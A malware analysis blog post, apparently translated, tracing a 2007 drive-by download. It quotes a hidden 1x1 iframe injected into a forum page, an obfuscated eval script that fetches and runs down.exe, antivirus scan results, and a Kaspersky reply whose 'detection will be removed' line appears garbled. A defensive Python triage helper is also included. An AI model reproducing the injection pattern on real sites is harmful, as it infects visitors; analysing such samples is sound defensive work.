down.exe / Virus.Win32.AutoRun.Z / Trojan.PWS.Maran.262
Endurer original
Version 2: added Kaspersky's reply.
Version 1
Opening a page occasionally used on a forum, Rising (antivirus) warned that the page was downloading and running a suspicious file.
Searching on Google shows that Google has already flagged it:
http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=%E8%BF%98%E7%8F%A0%E5%8C%BA+%E6%97%A7%E9%9B%A8%E6%A5%BC%E6%B8%85%E9%A3%8E%E9%98%81&meta=
Checking the page source, the following had been inserted:
/---
<iframe src=hxxp://i**.x***in**8.info/wm.htm width=1 height=1></iframe>
---/
hxxp://i***.x***in***8.info/wm.htm contains the code:
/---
<script src=0614.js></script>
---/
hxxp://i**.x**in**8.info/0614.js contains:
/---
eval("\146\165\156\143 ... (omitted) ... \146\75\61\73\175")
---/
After two rounds of decoding, the original code is obtained. Its function is to download down.exe and save it under %WINDIR%. The file name is generated by a user-defined function:
/---
function qk45u3(rm4mf){var m0qnw=window["Math"]["random"]()*rm4mf;return Math.round(m0qnw)+'.exe';}
---/
That is, the file is named ***.exe, where each * is a digit, and it is then launched through cmd.exe /c.
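As an added example (not code from the original post or from the malicious script), a small Python triage helper for the two artifacts described above: it flags 1x1 iframes in a page and peels the octal-escape eval() layers. The sample HTML and script are constructed here, with placeholder hostnames and a rewritten copy of the file-name function.

```python
import re
# Constructed samples modelled on the injection described in the post;
# the hostname is a placeholder, not the real one.
SAMPLE_HTML = ('<html><body>forum post text'
               '<iframe src=hxxp://example.invalid/wm.htm width=1 height=1></iframe>'
               '<iframe src="hxxp://example.invalid/ok.htm" width="300" height="200"></iframe>'
               '</body></html>')

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)')
EVAL_RE = re.compile(r'eval\s*\(\s*(["\'])(.*?)\1\s*\)', re.S)
OCT_RE = re.compile(r'\\([0-7]{1,3})')

def hidden_iframes(html):
    """Return the src of every iframe whose width and height are both <= 1 px."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v.strip('"\'') for k, v in ATTR_RE.findall(m.group(1))}
        try:
            tiny = int(attrs.get('width', '999')) <= 1 and int(attrs.get('height', '999')) <= 1
        except ValueError:
            tiny = False  # non-numeric size: not the 1x1 pattern, leave it alone
        if tiny and 'src' in attrs:
            found.append(attrs['src'])
    return found

def to_octal_eval(code):
    """Wrap JavaScript in one eval("\\NNN...") layer (only used to build the sample)."""
    return 'eval("' + ''.join('\\%o' % ord(c) for c in code) + '")'
def decode_octal_eval(js):
    """Peel a single eval("\\NNN...") layer; None if js is not of that shape."""
    m = EVAL_RE.search(js)
    if not m:
        return None
    return OCT_RE.sub(lambda o: chr(int(o.group(1), 8)), m.group(2))
def peel(js, max_layers=8):
    """Decode nested eval layers until plain code remains, returning each stage."""
    stages = []
    while len(stages) < max_layers:
        nxt = decode_octal_eval(js)
        if nxt is None:
            break
        stages.append(nxt)
        js = nxt
    return stages

# Two-layer sample (the post's 0614.js also needed two passes), built from a
# rewritten version of the file-name function quoted above.
INNER = "function qk45u3(rm4mf){return Math.round(Math.random()*rm4mf)+'.exe';}"
SAMPLE_JS = to_octal_eval(to_octal_eval(INNER))
```

`peel(SAMPLE_JS)[-1]` is the plaintext function; only the last stage is worth reading, and it is never executed.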
File description: D:/test/down.exe
Attributes: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time:
Size: 19602 bytes, 19.146 KB
MD5: a329a121353d80b9871119788f7b14c7
Packer: NsPack 1.3 -> North Star/Liu Xing Ping
File down.exe received at 09:14:12 (CET)
Current status: Completed
Anti-Virus engine | Version | Last update | Scan result
AhnLab-V3 | 2007.7.28.0 | 2007.07.27 | Win-Trojan/Hupigon.gen
AntiVir | 7.4.0.50 | 2007.07.27 | TR/Agent.19602
Authentium | 4.93.8 | 2007.07.27 | Possibly a new variant of W32/Threat-HLLIN-Slipper-based!Maximus
Avast | 4.7.997.0 | 2007.07.27 | Win32:Small-AMI
AVG | 7.5.0.476 | 2007.07.27 | Downloader.Generic5.ECA
BitDefender | 7.2 | 2007.07.28 | GenPack:Generic.Malware.WBdld.92022134
CAT-QuickHeal | 9.00 | 2007.07.26 | (Suspicious) - DNAScan
ClamAV | 0.91 | 2007.07.28 | -
DrWeb | 4.33 | 2007.07.27 | Trojan.PWS.Maran.262
eSafe | 7.0.15.0 | 2007.07.24 | Suspicious Trojan/Worm
eTrust-Vet | 31.1.5010 | 2007.07.28 | -
Ewido | 4.0 | 2007.07.27 | -
FileAdvisor | 1 | 2007.07.28 | -
Fortinet | 2.91.0.0 | 2007.07.28 | -
F-Prot | 4.3.2.48 | 2007.07.27 | W32/Threat-HLLIN-Slipper-based!Maximus
F-Secure | 6.70.13030.0 | 2007.07.27 | W32/Hupigon.gen67
Ikarus | T3.1.1.8 | 2007.07.27 | Backdoor.Win32.Agent.ahj
Kaspersky | 4.0.2.24 | 2007.07.28 | -
McAfee | 5085 | 2007.07.27 | -
Microsoft | 1.2704 | 2007.07.28 | -
NOD32v2 | 2426 | 2007.07.27 | a variant of Win32/TrojanDownloader.Delf.NSA
Norman | 5.80.02 | 2007.07.27 | W32/Hupigon.gen67
Panda | 9.0.0.4 | 2007.07.28 | Generic Trojan
Rising | 19.33.42.00 | 2007.07.27 | -
Prevx1 | V2 | 2007.07.28 | W32.Malware.gen
Sophos | 4.19.0 | 2007.07.26 | Mal/Packer
Sunbelt | 2.2.907.0 | 2007.07.28 | VIPRE.Suspicious
Symantec | 10 | 2007.07.28 | -
TheHacker | 6.1.7.155 | 2007.07.28 | -
VBA32 | 3.12.2.1 | 2007.07.27 | Malware.Trojan-PSW.Game.14
VirusBuster | 4.3.26:9 | 2007.07.27 | -
Webwasher-Gateway | 6.0.1 | 2007.07.28 | Trojan.Agent.19602
Additional information
File size: 19602 bytes
MD5: a329a121353d80b9871119788f7b14c7
SHA1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=cbb0e79992c2fa964c9000f9f5065b00efb6d5a7
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
Subject: Re: [KLAB-2516758]
Sender: "" <Newvirus@kaspersky.com>
Sent at: 16:16:38
Hello.
Virus.Win32.AutoRun.Z
New malicious software was found in the attached file.
Its detection will be removed in the next update. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus analyst, Kaspersky Lab.